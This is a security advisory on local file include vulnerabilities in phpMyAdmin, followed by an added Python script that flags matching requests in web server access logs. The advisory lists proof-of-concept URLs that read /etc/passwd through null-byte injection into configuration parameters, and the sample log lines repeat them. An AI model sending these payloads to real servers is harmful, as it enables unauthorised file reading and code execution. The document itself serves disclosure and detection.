source: https://www.securityfocus.com/bid/12645/info

phpMyAdmin is affected by multiple local file include vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include()', 'require()', 'require_once()', or similar function call.

An attacker may leverage these issues to execute arbitrary server-side script code that resides on an affected computer with the privileges of the Web server process. This may potentially facilitate unauthorized access.

It should be noted that these issues may also be leveraged to read arbitrary files on an affected computer with the privileges of the Web server.

http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc/passwd%00&theme=passwd%00

http://www.example.com/phpMyAdmin/css/phpmyadmin.css.php?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00

http://www.example.com/phpMyAdmin/libraries/database_interface.lib.php?cfg[Server][extension]=cXIb8O3
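
Added example, not part of the original advisory and not phpMyAdmin code: a Python check that flags web server access log entries matching the request shapes above (query parameters that write into the GLOBALS or cfg arrays, and null bytes in parameter values). The function names, the Apache combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names that try to set phpMyAdmin configuration arrays from the request.
CONFIG_OVERRIDE = re.compile(r"^(GLOBALS|cfg)\[", re.IGNORECASE)
# Request line inside an Apache combined-format log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def findings_for_url(url):
    """Return a sorted list of reasons a request URL resembles the include abuse."""
    reasons = set()
    # parse_qsl percent-decodes names and values, so %5B / %00 variants are covered.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        override = bool(CONFIG_OVERRIDE.match(name))
        if override:
            reasons.add("config-override")
        if "\x00" in name or "\x00" in value:
            reasons.add("null-byte")
        # A filesystem path supplied as a configuration value.
        if override and (value.startswith("/") or ".." in value):
            reasons.add("path-value")
    return sorted(reasons)

def scan_access_log(lines):
    """Return (line_number, reasons) for every log line worth reviewing."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = findings_for_url(match.group(1))
        if reasons:
            hits.append((lineno, reasons))
    return hits

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2005:10:00:01 +0000] "GET /phpMyAdmin/index.php?db=test HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Mar/2005:10:00:07 +0000] "GET /phpMyAdmin/css/phpmyadmin.css.php'
    '?GLOBALS[cfg][ThemePath]=/etc&theme=passwd%00 HTTP/1.1" 200 1843',
    '192.0.2.44 - - [01/Mar/2005:10:00:09 +0000] "GET /phpMyAdmin/libraries/database_interface.lib.php'
    '?cfg[Server][extension]=cXIb8O3 HTTP/1.1" 200 312',
]

if __name__ == "__main__":
    for lineno, reasons in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(reasons)}")
```

A hit on a library or CSS script that is never meant to be requested with such parameters is a strong signal; the same patterns on other pages need review before alerting.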